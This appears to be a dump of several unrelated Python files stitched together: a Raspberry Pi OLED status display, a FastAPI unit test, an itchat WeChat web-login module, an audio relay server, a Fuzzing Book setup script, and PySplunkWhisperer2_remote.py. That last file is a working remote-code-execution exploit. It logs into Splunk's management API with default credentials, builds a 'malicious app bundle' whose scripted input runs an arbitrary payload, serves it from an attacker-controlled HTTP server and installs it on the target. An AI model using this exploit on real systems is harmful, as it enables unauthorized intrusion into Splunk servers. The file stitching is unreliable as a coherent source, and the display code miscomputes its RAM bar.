cpu = int(psutil.cpu_percent(percpu=False))
draw.text((0, 34), "CPU", font=font, fill=255)
draw.rectangle((26, 34, 126, 34 + 6), outline=255, fill=0)
draw.rectangle((26, 34, 26 + cpu, 34 + 6), outline=255, fill=255)
mem = int(psutil.virtual_memory().percent)
draw.text((0, 44), "RAM", font=font, fill=255)
draw.rectangle((26, 44, 126, 44 + 6), outline=255, fill=0)
draw.rectangle((26, 44, 26 + cpu, 44 + 6), outline=255, fill=255)
disk = int(psutil.disk_usage(mount_point).percent)
draw.text((0, 54), "Disk", font=font, fill=255)
draw.rectangle((26, 54, 126, 54 + 6), outline=255, fill=0)
draw.rectangle((26, 54, 26 + disk, 54 + 6), outline=255, fill=255 )
disp.display(image)
def LS2():
#2nd Screen PiHole Infos...
req = requests.get('http://pi.hole/admin/api.php')
data = req.json()
draw.text((0, 0), "Pi-hole (%s)" % data["status"], font=font, fill=255)
draw.line((0, 12, width, 12), fill=255)
draw.text((0, 22), "Blocked: %d (%d%%)" % (data["ads_blocked_today"], data["ads_percentage_today"]), font=font, fill=255)
draw.text((0, 32), "Queries: %d" % data["dns_queries_today"], font=font, fill=255)
draw.line((0, 50, width, 50), fill=255)
draw.text((0, 54), "Blocklist: %d" % data["domains_being_blocked"], font=font, fill=255)
disp.display(image)
def RS1():
#1st Fritzbox screen (uptime, up-/download)
fbuptime = fs.str_uptime
fbspeed = fs.str_max_bit_rate
draw.text((0, 0), "Fritz.Box infos: ", font=datebold, fill=255)
draw.line((0, 10, width, 10), fill=255)
draw.text((0, 14), "Uptime: ", font=font, fill=255)
draw.text((64, 14), fbuptime, font=font, fill=255)
draw.text((0,26), "Upload-Speed: ", font=font, fill=255)
draw.text((50,36), fbspeed[0], font=font, fill=255)
draw.text((0,46), "Download-Speed: ", font=font, fill=255)
draw.text((50,56), fbspeed[1], font=font, fill=255)
disp2.display(image)
def RS2():
#2nd Fritzbox screen
#hosts = fh.host_numbers()
#ssid = fw.ssid
#missedcalls = fc.get_missed_calls(update=True, num=10, days=7)
draw.text((0, 0), "Fritz.Box infos: ", font=font1, fill=255)
draw.line((0, 10, width, 10), fill=255)
draw.text((0, 14), "SSID: ", font=font3, fill=255)
draw.text((64, 14), "ssid", font=font2, fill=255)
draw.text((0,26), "Hosts: ", font=font3, fill=255)
draw.text((50,36), "hosts", font=font4, fill=255)
draw.text((0,46), "missed calls: ", font=font, fill=255)
draw.text((50,56), "missedcalls", font=font, fill=255)
disp2.display(image)
def LeftLogo():
show_logoleft("Pi-.bmp", disp)
def RightLogo():
show_logoright("Hole.bmp", disp2)
def LeftGif():
#Gifscreen for left display
regulator = framerate_regulator(fps=10)
left_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res', '04L.gif'))
left = Image.open(left_path)
size = [128, 64]
posn = (0, 0)
while True:
for frame in ImageSequence.Iterator(left):
with regulator:
background = Image.new("RGB", disp.size, "white")
background.paste(frame.resize(size, resample=Image.LANCZOS), posn)
disp.display(background.convert("1"))
def RightGif():
#Gifscreen for right display
regulator2 = framerate_regulator(fps=10)
right_path = os.path.abspath(os.path.join(os.path.dirname(__file__), 'res', '04R.gif'))
right = Image.open(right_path)
size = [128, 64]
posn = (0, 0)
while True:
for frame in ImageSequence.Iterator(right):
with regulator2:
background = Image.new("RGB", disp.size, "white")
background.paste(frame.resize(size, resample=Image.LANCZOS), posn)
disp2.display(background.convert("1"))
while True:
if loopcount >= 10 or UPTag != "0":
print('1.1 Schleife:', UPTag, dispcounter, loopcount)#tester
p7 = Process(target = CheckIfUp)
p7.start()
time.sleep(2.0)
f = open("UPTag.txt", "r")
UPTag = f.read()
f.close()
p7.kill()
if UPTag != "0":
time.sleep(30.0)
print('1.4 Schleife:', UPTag, dispcounter, loopcount)#tester
if UPTag == "0":
loopcount = 0
print('1.5 Schleife:', UPTag, dispcounter, loopcount)#tester
elif loopcount <= 10 and dispcounter == 1: #and UPTag == "0":
print('2.1 Schleife:', UPTag, dispcounter, loopcount)#tester
p5 = Process(target = LeftLogo)
p6 = Process(target = RightLogo)
p5.start()
p6.start()
time.sleep(5.0)
p5.kill()
p6.kill()
dispcounter += 1
elif dispcounter == 2: #and UPTag == "0":
print('2.2 Schleife:', UPTag, dispcounter, loopcount)#tester
p1 = Process(target = LS1)
p2 = Process(target = RS1)
p1.start()
p2.start()
time.sleep(5.0)
p1.kill()
p2.kill()
dispcounter += 1
elif dispcounter == 3: #and UPTag == "0":
#print('2.3 Schleife:', UPTag, dispcounter, loopcount)#tester
p5 = Process(target = LeftGif)
p6 = Process(target = RightGif)
p5.start()
p6.start()
time.sleep(14.4)
p5.kill()
p6.kill()
dispcounter += 1
elif dispcounter == 4: #and UPTag == "0":
#print('2.4 Schleife:', UPTag, dispcounter, loopcount)#tester
p3 = Process(target = LS2)
p4 = Process(target = RS2)
p3.start()
p4.start()
time.sleep(5.0)
p3.kill()
p4.kill()
dispcounter += 1
elif dispcounter == 5: #and UPTag == "0":
print('2.4 Schleife:', UPTag, dispcounter, loopcount)#tester
p8 = Process(target = ClockDisplayL)
p9 = Process(target = ClockDisplayR)
p8.start()
p9.start()
time.sleep(5.0)
p8.kill()
p9.kill()
dispcounter -= 3
loopcount += 1
print('ende:', UPTag, dispcounter, loopcount)#tester
|
test_responses.py
|
# -*- coding: utf-8 -*-
import multiprocessing
import os
from unittest import TestCase
import uvicorn
from fastapi import FastAPI
from fastapi.testclient import TestClient
from projects.api.main import app, parse_args
from projects.controllers.utils import uuid_alpha
from projects.database import engine
TEST_CLIENT = TestClient(app)
PROJECT_ID = str(uuid_alpha())
DEPLOYMENT_ID = str(uuid_alpha())
EXPERIMENT_ID = None
NAME = "foo"
CREATED_AT = "2000-01-01 00:00:00"
UPDATED_AT = "2000-01-01 00:00:00"
DESCRIPTION = "Description"
POSITION = 0
class TestResponses(TestCase):
def setUp(self):
os.environ["BROKER_URL"] = "http://localhost:8000"
app = FastAPI()
@app.post("/")
async def root():
return {}
self.proc = multiprocessing.Process(target=uvicorn.run, args=(app,))
self.proc.start()
conn = engine.connect()
text = (
f"INSERT INTO projects (uuid, name, description, created_at, updated_at) "
f"VALUES (%s, %s, %s, %s, %s)"
)
conn.execute(text, (PROJECT_ID, NAME, DESCRIPTION, CREATED_AT, UPDATED_AT,))
text = (
f"INSERT INTO deployments (uuid, name, project_id, experiment_id, position, is_active, created_at, updated_at) "
f"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
)
conn.execute(text, (DEPLOYMENT_ID, NAME, PROJECT_ID, EXPERIMENT_ID, POSITION, 1, CREATED_AT, UPDATED_AT,))
conn.close()
def tearDown(self):
self.proc.terminate()
conn = engine.connect()
text = f"DELETE FROM deployments WHERE project_id = '{PROJECT_ID}'"
conn.execute(text)
text = f"DELETE FROM projects WHERE uuid = '{PROJECT_ID}'"
conn.execute(text)
conn.close()
def test_parse_args(self):
parser = parse_args([])
self.assertEqual(parser.port, 8080)
self.assertFalse(parser.enable_cors)
def test_post(self):
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"data": {
"ndarray": [
[1, 2, "a"]
]
}
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"strData": "texto"
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
rv = TEST_CLIENT.post(f"/projects/{PROJECT_ID}/deployments/{DEPLOYMENT_ID}/responses", json={
"binData": "Cg=="
})
result = rv.text
expected = "{\"message\":\"OK\"}"
self.assertEqual(result, expected)
self.assertEqual(rv.status_code, 200)
|
login.py
|
import os, time, re, io
import threading
import json, xml.dom.minidom
import random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
picDir=picDir, qrCallback=qrCallback)
logger.info('Please scan the QR code to log in.')
isLoggedIn = False
while not isLoggedIn:
status = self.check_login()
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=self.uuid, status=status, qrcode=qrStorage.getvalue())
if status == '200':
isLoggedIn = True
elif status == '201':
if isLoggedIn is not None:
logger.info('Please press confirm on your phone.')
isLoggedIn = None
elif status != '408':
break
if isLoggedIn:
break
elif self.isLogging:
logger.info('Log in time out, reloading QR code.')
else:
return # log in process is stopped by user
logger.info('Loading the contact, this may take a little while.')
self.web_init()
self.show_mobile_login()
self.get_contact(True)
if hasattr(loginCallback, '__call__'):
r = loginCallback()
else:
utils.clear_screen()
if os.path.exists(picDir or config.DEFAULT_QR):
os.remove(picDir or config.DEFAULT_QR)
logger.info('Login successfully as %s' % self.storageClass.nickName)
self.start_receiving(exitCallback)
self.isLogging = False
def push_login(core):
cookiesDict = core.s.cookies.get_dict()
if 'wxuin' in cookiesDict:
url = '%s/cgi-bin/mmwebwx-bin/webwxpushloginurl?uin=%s' % (
config.BASE_URL, cookiesDict['wxuin'])
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(url, headers=headers).json()
if 'uuid' in r and r.get('ret') in (0, '0'):
core.uuid = r['uuid']
return r['uuid']
return False
def get_QRuuid(self):
url = '%s/jslogin' % config.BASE_URL
params = {
'appid' : 'wx782c26e4c19acffb',
'fun' : 'new', }
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)";'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
self.uuid = data.group(2)
return self.uuid
def get_QR(self, uuid=None, enableCmdQR=False, picDir=None, qrCallback=None):
uuid = uuid or self.uuid
picDir = picDir or config.DEFAULT_QR
qrStorage = io.BytesIO()
qrCode = QRCode('https://login.weixin.qq.com/l/' + uuid)
qrCode.png(qrStorage, scale=10)
if hasattr(qrCallback, '__call__'):
qrCallback(uuid=uuid, status='0', qrcode=qrStorage.getvalue())
else:
with open(picDir, 'wb') as f:
f.write(qrStorage.getvalue())
if enableCmdQR:
utils.print_cmd_qr(qrCode.text(1), enableCmdQR=enableCmdQR)
else:
utils.print_qr(picDir)
return qrStorage
def check_login(self, uuid=None):
uuid = uuid or self.uuid
url = '%s/cgi-bin/mmwebwx-bin/login' % config.BASE_URL
localTime = int(time.time())
params = 'loginicon=true&uuid=%s&tip=1&r=%s&_=%s' % (
uuid, int(-localTime / 1579), localTime)
headers = { 'User-Agent' : config.USER_AGENT }
r = self.s.get(url, params=params, headers=headers)
regx = r'window.code=(\d+)'
data = re.search(regx, r.text)
if data and data.group(1) == '200':
if process_login_info(self, r.text):
return '200'
else:
return '400'
elif data:
return data.group(1)
else:
return '400'
def process_login_info(core, loginContent):
''' when finish login (scanning qrcode)
* syncUrl and fileUploadingUrl will be fetched
* deviceid and msgid will be generated
* skey, wxsid, wxuin, pass_ticket will be fetched
'''
regx = r'window.redirect_uri="(\S+)";'
core.loginInfo['url'] = re.search(regx, loginContent).group(1)
headers = { 'User-Agent' : config.USER_AGENT }
r = core.s.get(core.loginInfo['url'], headers=headers, allow_redirects=False)
core.loginInfo['url'] = core.loginInfo['url'][:core.loginInfo['url'].rfind('/')]
for indexUrl, detailedUrl in (
("wx2.qq.com" , ("file.wx2.qq.com", "webpush.wx2.qq.com")),
("wx8.qq.com" , ("file.wx8.qq.com", "webpush.wx8.qq.com")),
("qq.com" , ("file.wx.qq.com", "webpush.wx.qq.com")),
("web2.wechat.com" , ("file.web2.wechat.com", "webpush.web2.wechat.com")),
("wechat.com" , ("file.web.wechat.com", "webpush.web.wechat.com"))):
fileUrl, syncUrl = ['https://%s/cgi-bin/mmwebwx-bin' % url for url in detailedUrl]
if indexUrl in core.loginInfo['url']:
core.loginInfo['fileUrl'], core.loginInfo['syncUrl'] = \
fileUrl, syncUrl
break
else:
core.loginInfo['fileUrl'] = core.loginInfo['syncUrl'] = core.loginInfo['url']
core.loginInfo['deviceid'] = 'e' + repr(random.random())[2:17]
core.loginInfo['logintime'] = int(time.time() * 1e3)
core.loginInfo['BaseRequest'] = {}
for node in xml.dom.minidom.parseString(r.text).documentElement.childNodes:
if node.nodeName == 'skey':
core.loginInfo['skey'] = core.loginInfo['BaseRequest']['Skey'] = node.childNodes[0].data
elif node.nodeName == 'wxsid':
core.loginInfo['wxsid'] = core.loginInfo['BaseRequest']['Sid'] = node.childNodes[0].data
elif node.nodeName == 'wxuin':
core.loginInfo['wxuin'] = core.loginInfo['BaseRequest']['Uin'] = node.childNodes[0].data
elif node.nodeName == 'pass_ticket':
core.loginInfo['pass_ticket'] = core.loginInfo['BaseRequest']['DeviceID'] = node.childNodes[0].data
if not all([key in core.loginInfo for key in ('skey', 'wxsid', 'wxuin', 'pass_ticket')]):
logger.error('Your wechat account may be LIMITED to log in WEB wechat, error info:\n%s' % r.text)
core.isLogging = False
return False
return True
def web_init(self):
url = '%s/webwxinit' % self.loginInfo['url']
params = {
'r': int(-time.time() / 1579),
'pass_ticket': self.loginInfo['pass_ticket'], }
data = { 'BaseRequest': self.loginInfo['BaseRequest'], }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, params=params, data=json.dumps(data), headers=headers)
dic = json.loads(r.content.decode('utf-8', 'replace'))
# deal with login info
utils.emoji_formatter(dic['User'], 'NickName')
self.loginInfo['InviteStartCount'] = int(dic['InviteStartCount'])
self.loginInfo['User'] = wrap_user_dict(utils.struct_friend_info(dic['User']))
self.memberList.append(self.loginInfo['User'])
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncKey']['List']])
self.storageClass.userName = dic['User']['UserName']
self.storageClass.nickName = dic['User']['NickName']
# deal with contact list returned when init
contactList = dic.get('ContactList', [])
chatroomList, otherList = [], []
for m in contactList:
if m['Sex'] != 0:
otherList.append(m)
elif '@@' in m['UserName']:
m['MemberList'] = [] # don't let dirty info pollute the list
chatroomList.append(m)
elif '@' in m['UserName']:
# mp will be dealt in update_local_friends as well
otherList.append(m)
if chatroomList:
update_local_chatrooms(self, chatroomList)
if otherList:
update_local_friends(self, otherList)
return dic
def show_mobile_login(self):
url = '%s/webwxstatusnotify?lang=zh_CN&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'Code' : 3,
'FromUserName' : self.storageClass.userName,
'ToUserName' : self.storageClass.userName,
'ClientMsgId' : int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT, }
r = self.s.post(url, data=json.dumps(data), headers=headers)
return ReturnValue(rawResponse=r)
def start_receiving(self, exitCallback=None, getReceivingFnOnly=False):
self.alive = True
def maintain_loop():
retryCount = 0
while self.alive:
try:
i = sync_check(self)
if i is None:
self.alive = False
elif i == '0':
pass
else:
msgList, contactList = self.get_msg()
if msgList:
msgList = produce_msg(self, msgList)
for msg in msgList:
self.msgList.put(msg)
if contactList:
chatroomList, otherList = [], []
for contact in contactList:
if '@@' in contact['UserName']:
chatroomList.append(contact)
else:
otherList.append(contact)
chatroomMsg = update_local_chatrooms(self, chatroomList)
chatroomMsg['User'] = self.loginInfo['User']
self.msgList.put(chatroomMsg)
update_local_friends(self, otherList)
retryCount = 0
except requests.exceptions.ReadTimeout:
pass
except:
retryCount += 1
logger.error(traceback.format_exc())
if self.receivingRetryCount < retryCount:
self.alive = False
else:
time.sleep(1)
self.logout()
if hasattr(exitCallback, '__call__'):
exitCallback()
else:
logger.info('LOG OUT!')
if getReceivingFnOnly:
return maintain_loop
else:
maintainThread = threading.Thread(target=maintain_loop)
maintainThread.setDaemon(True)
maintainThread.start()
def sync_check(self):
url = '%s/synccheck' % self.loginInfo.get('syncUrl', self.loginInfo['url'])
params = {
'r' : int(time.time() * 1000),
'skey' : self.loginInfo['skey'],
'sid' : self.loginInfo['wxsid'],
'uin' : self.loginInfo['wxuin'],
'deviceid' : self.loginInfo['deviceid'],
'synckey' : self.loginInfo['synckey'],
'_' : self.loginInfo['logintime'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.loginInfo['logintime'] += 1
try:
r = self.s.get(url, params=params, headers=headers, timeout=config.TIMEOUT)
except requests.exceptions.ConnectionError as e:
try:
if not isinstance(e.args[0].args[1], BadStatusLine):
raise
# will return a package with status '0 -'
# and value like:
# 6f:00:8a:9c:09:74:e4:d8:e0:14:bf:96:3a:56:a0:64:1b:a4:25:5d:12:f4:31:a5:30:f1:c6:48:5f:c3:75:6a:99:93
# seems like status of typing, but before I make further achievement code will remain like this
return '2'
except:
raise
r.raise_for_status()
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
pm = re.search(regx, r.text)
if pm is None or pm.group(1) != '0':
logger.debug('Unexpected sync check result: %s' % r.text)
return None
return pm.group(2)
def get_msg(self):
url = '%s/webwxsync?sid=%s&skey=%s&pass_ticket=%s' % (
self.loginInfo['url'], self.loginInfo['wxsid'],
self.loginInfo['skey'],self.loginInfo['pass_ticket'])
data = {
'BaseRequest' : self.loginInfo['BaseRequest'],
'SyncKey' : self.loginInfo['SyncKey'],
'rr' : ~int(time.time()), }
headers = {
'ContentType': 'application/json; charset=UTF-8',
'User-Agent' : config.USER_AGENT }
r = self.s.post(url, data=json.dumps(data), headers=headers, timeout=config.TIMEOUT)
dic = json.loads(r.content.decode('utf-8', 'replace'))
if dic['BaseResponse']['Ret'] != 0: return None, None
self.loginInfo['SyncKey'] = dic['SyncKey']
self.loginInfo['synckey'] = '|'.join(['%s_%s' % (item['Key'], item['Val'])
for item in dic['SyncCheckKey']['List']])
return dic['AddMsgList'], dic['ModContactList']
def logout(self):
if self.alive:
url = '%s/webwxlogout' % self.loginInfo['url']
params = {
'redirect' : 1,
'type' : 1,
'skey' : self.loginInfo['skey'], }
headers = { 'User-Agent' : config.USER_AGENT }
self.s.get(url, params=params, headers=headers)
self.alive = False
self.isLogging = False
self.s.cookies.clear()
del self.chatroomList[:]
del self.memberList[:]
del self.mpList[:]
return ReturnValue({'BaseResponse': {
'ErrMsg': 'logout successfully.',
'Ret': 0, }})
|
PySplunkWhisperer2_remote.py
|
import sys, os, tempfile, shutil
import tarfile
import requests
import SocketServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
import argparse
import threading
requests.packages.urllib3.disable_warnings(category=requests.packages.urllib3.exceptions.InsecureRequestWarning)
SPLUNK_APP_NAME = '_PWN_APP_'
def create_splunk_bundle(options):
tmp_path = tempfile.mkdtemp()
os.mkdir(os.path.join(tmp_path, SPLUNK_APP_NAME))
bin_dir = os.path.join(tmp_path, SPLUNK_APP_NAME, "bin")
os.mkdir(bin_dir)
pwn_file = os.path.join(bin_dir, options.payload_file)
open(pwn_file, "w").write(options.payload)
# make the script executable - not 100% certain this makes a difference
os.chmod(pwn_file, 0o700)
local_dir = os.path.join(tmp_path, SPLUNK_APP_NAME, "local")
os.mkdir(local_dir)
inputs_conf = os.path.join(local_dir, "inputs.conf")
with open(inputs_conf, "w") as f:
inputs = '[script://$SPLUNK_HOME/etc/apps/{}/bin/{}]\n'.format(SPLUNK_APP_NAME, options.payload_file)
inputs += 'disabled = false\n'
inputs += 'index = default\n'
inputs += 'interval = 60.0\n'
inputs += 'sourcetype = test\n'
f.write(inputs)
(fd, tmp_bundle) = tempfile.mkstemp(suffix='.tar')
os.close(fd)
with tarfile.TarFile(tmp_bundle, mode="w") as tf:
tf.add(os.path.join(tmp_path, SPLUNK_APP_NAME), arcname=SPLUNK_APP_NAME)
shutil.rmtree(tmp_path)
return tmp_bundle
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self):
global BUNDLE_FILE
bundle = open(BUNDLE_FILE, 'rb').read()
self.send_response(200)
self.send_header('Expires', 'Thu, 26 Oct 1978 00:00:00 GMT')
self.send_header('Cache-Control', 'no-store, no-cache, must-revalidate, max-age=0')
self.send_header('Content-type', 'application/tar')
self.send_header('Content-Disposition', 'attachment; filename="splunk_bundle.tar"')
self.send_header('Content-Length', len(bundle))
self.end_headers()
self.wfile.write(bundle)
class ThreadedHTTPServer(object):
"""Runs SimpleHTTPServer in a thread
Lets you start and stop an instance of SimpleHTTPServer.
"""
def __init__(self, host, port, request_handler=SimpleHTTPRequestHandler):
"""Prepare thread and socket server
Creates the socket server that will use the HTTP request handler. Also
prepares the thread to run the serve_forever method of the socket
server as a daemon once it is started
"""
SocketServer.TCPServer.allow_reuse_address = True
self.server = SocketServer.TCPServer((host, port), request_handler)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
def stop(self):
"""Stop the HTTP server
Stops the server and cleans up the port assigned to the socket
"""
self.server.shutdown()
self.server.server_close()
parser = argparse.ArgumentParser()
parser.add_argument('--scheme', default="https")
parser.add_argument('--host', default="localhost")
parser.add_argument('--port', default=8089)
parser.add_argument('--lhost', required=True)
parser.add_argument('--lport', default=8181)
parser.add_argument('--username', default="admin")
parser.add_argument('--password', default="changeme")
parser.add_argument('--payload', default="calc.exe")
parser.add_argument('--payload-file', default="pwn.bat")
options = parser.parse_args()
print "Running in remote mode (Remote Code Execution)"
SPLUNK_BASE_API = "{}://{}:{}/services/apps/local/".format(options.scheme, options.host, options.port, )
s = requests.Session()
s.auth = requests.auth.HTTPBasicAuth(options.username, options.password)
s.verify = False
print "[.] Authenticating..."
req = s.get(SPLUNK_BASE_API)
if req.status_code == 401:
print "Authentication failure"
print ""
print req.text
sys.exit(-1)
print "[+] Authenticated"
print "[.] Creating malicious app bundle..."
BUNDLE_FILE = create_splunk_bundle(options)
print "[+] Created malicious app bundle in: " + BUNDLE_FILE
httpd = ThreadedHTTPServer(options.lhost, options.lport, request_handler=CustomHandler)
print "[+] Started HTTP server for remote mode"
lurl = "http://{}:{}/".format(options.lhost, options.lport)
print "[.] Installing app from: " + lurl
req = s.post(SPLUNK_BASE_API, data={'name': lurl, 'filename': True, 'update': True})
if req.status_code != 200 and req.status_code != 201:
print "Got a problem: " + str(req.status_code)
print ""
print req.text
print "[+] App installed, your code should be running now!"
print "\nPress RETURN to cleanup"
raw_input()
os.remove(BUNDLE_FILE)
print "[.] Removing app..."
req = s.delete(SPLUNK_BASE_API + SPLUNK_APP_NAME)
if req.status_code != 200 and req.status_code != 201:
print "Got a problem: " + str(req.status_code)
print ""
print req.text
print "[+] App removed"
httpd.stop()
print "[+] Stopped HTTP server"
print "Bye!"
|
serverAudio.py
|
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
HOST = input("Enter Host IP\n")
PORT = 4000
BufferSize = 4096
addresses = {}
def Connections():
while True:
try:
client, addr = server.accept()
print("{} is connected!!".format(addr))
addresses[client] = addr
Thread(target=ClientConnectionSound, args=(client, )).start()
except:
continue
def ClientConnectionSound(client):
while True:
try:
data = client.recv(BufferSize)
broadcastSound(client, data)
except:
continue
def broadcastSound(clientSocket, data_to_be_sent):
for client in addresses:
if client != clientSocket:
client.sendall(data_to_be_sent)
server = socket(family=AF_INET, type=SOCK_STREAM)
try:
server.bind((HOST, PORT))
except OSError:
print("Server Busy")
server.listen(2)
print("Waiting for connection..")
AcceptThread = Thread(target=Connections)
AcceptThread.start()
AcceptThread.join()
|
FuzzingInTheLarge.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# "Fuzzing in the Large" - a chapter of "The Fuzzing Book"
# Web site: https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
# Last change: 2021-11-03 13:27:49+01:00
#
# Copyright (c) 2021 CISPA Helmholtz Center for Information Security
# Copyright (c) 2018-2020 Saarland University, authors, and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
r'''
The Fuzzing Book - Fuzzing in the Large
This file can be _executed_ as a script, running all experiments:
$ python FuzzingInTheLarge.py
or _imported_ as a package, providing classes, functions, and constants:
>>> from fuzzingbook.FuzzingInTheLarge import <identifier>
but before you do so, _read_ it and _interact_ with it at:
https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
The Python `FuzzManager` package allows for programmatic submission of failures from a large number of (fuzzed) programs. One can query crashes and their details, collect them into buckets to ensure thay will be treated the same, and also retrieve coverage information for debugging both programs and their tests.
For more details, source, and documentation, see
"The Fuzzing Book - Fuzzing in the Large"
at https://www.fuzzingbook.org/html/FuzzingInTheLarge.html
'''
# Allow to use 'from . import <module>' when run as script (cf. PEP 366)
if __name__ == '__main__' and __package__ is None:
__package__ = 'fuzzingbook'
# Fuzzing in the Large
# ====================
if __name__ == '__main__':
print('# Fuzzing in the Large')
if __name__ == '__main__':
# We use the same fixed seed as the notebook to ensure consistency
import random
random.seed(2001)
from . import Fuzzer
## Synopsis
## --------
if __name__ == '__main__':
print('\n## Synopsis')
## Collecting Crashes from Multiple Fuzzers
## ----------------------------------------
if __name__ == '__main__':
print('\n## Collecting Crashes from Multiple Fuzzers')
from graphviz import Digraph
if __name__ == '__main__':
g = Digraph()
server = 'Crash Server'
g.node('Crash Database', shape='cylinder')
for i in range(1, 7):
g.edge('Fuzzer ' + repr(i), server)
g.edge(server, 'Crash Database')
g
## Running a Crash Server
## ----------------------
if __name__ == '__main__':
print('\n## Running a Crash Server')
### Excursion: Setting up the Server
if __name__ == '__main__':
print('\n### Excursion: Setting up the Server')
import os
import sys
import shutil
if __name__ == '__main__':
if 'CI' in os.environ:
# Can't run this in our continuous environment,
# since it can't run a headless Web browser
sys.exit(0)
if __name__ == '__main__':
if os.path.exists('FuzzManager'):
shutil.rmtree('FuzzManager')
if __name__ == '__main__':
import os
os.system(f'git clone https://github.com/MozillaSecurity/FuzzManager')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; git checkout 0.4.1')
if __name__ == '__main__':
import os
os.system(f'pip install -r FuzzManager/server/requirements.txt > /dev/null')
if __name__ == '__main__':
import os
os.system(f'cd FuzzManager; python server/manage.py migrate > /dev/null')
if __name__ == '__main__':
import os
os.system(f'(cd FuzzManager; echo "from django.contrib.auth import get_user_model; User = get_user_model(); User.objects.create_superuser(\'demo\', \'demo@fuzzingbook.org\', \'demo\')" | python server/manage.py shell)')
import subprocess
import sys
if __name__ == '__main__':
os.chdir('FuzzManager')
result = subprocess.run(['python',
'server/manage.py',
'get_auth_token',
'demo'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
os.chdir('..')
err = result.stderr.decode('ascii')
if len(err) > 0:
print(err, file=sys.stderr, end="")
if __name__ == '__main__':
token = result.stdout
token = token.decode('ascii').strip()
token
if __name__ == '__main__':
assert len(token) > 10, "Invalid token " + repr(token)
if __name__ == '__main__':
home = os.path.expanduser("~")
conf = os.path.join(home, ".fuzzmanagerconf")
if __name__ == '__main__':
fuzzmanagerconf = """
[Main]
sigdir = /home/example/fuzzingbook
serverhost = 127.0.0.1
serverport = 8000
serverproto = http
serverauthtoken = %s
tool = fuzzingbook
""" % token
if __name__ == '__main__':
with open(conf, "w") as file:
file.write(fuzzmanagerconf)
from pygments.lexers.configs import IniLexer
from .bookutils import print_file
if __name__ == '__main__':
print_file(conf, lexer=IniLexer())
### End of Excursion
if __name__ == '__main__':
print('\n### End of Excursion')
### Excursion: Starting the Server
if __name__ == '__main__':
print('\n### Excursion: Starting the Server')
from multiprocess import Process
import subprocess
def run_fuzzmanager():
def run_fuzzmanager_forever():
os.chdir('FuzzManager')
proc = subprocess.Popen(['python', 'server/manage.py',
'runserver'],
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True)
while True:
line = proc.stdout.readline()
print(line, end='')
fuzzmanager_process = Process(target=run_fuzzmanager_forever)
fuzzmanager_process.start()
return fuzzmanager_process
if __name__ == '__main__':
fuzzmanager_process = run_fuzzmanager()
import time
if __name__ == '__main__':
time.sleep(2)
### End of Excursion
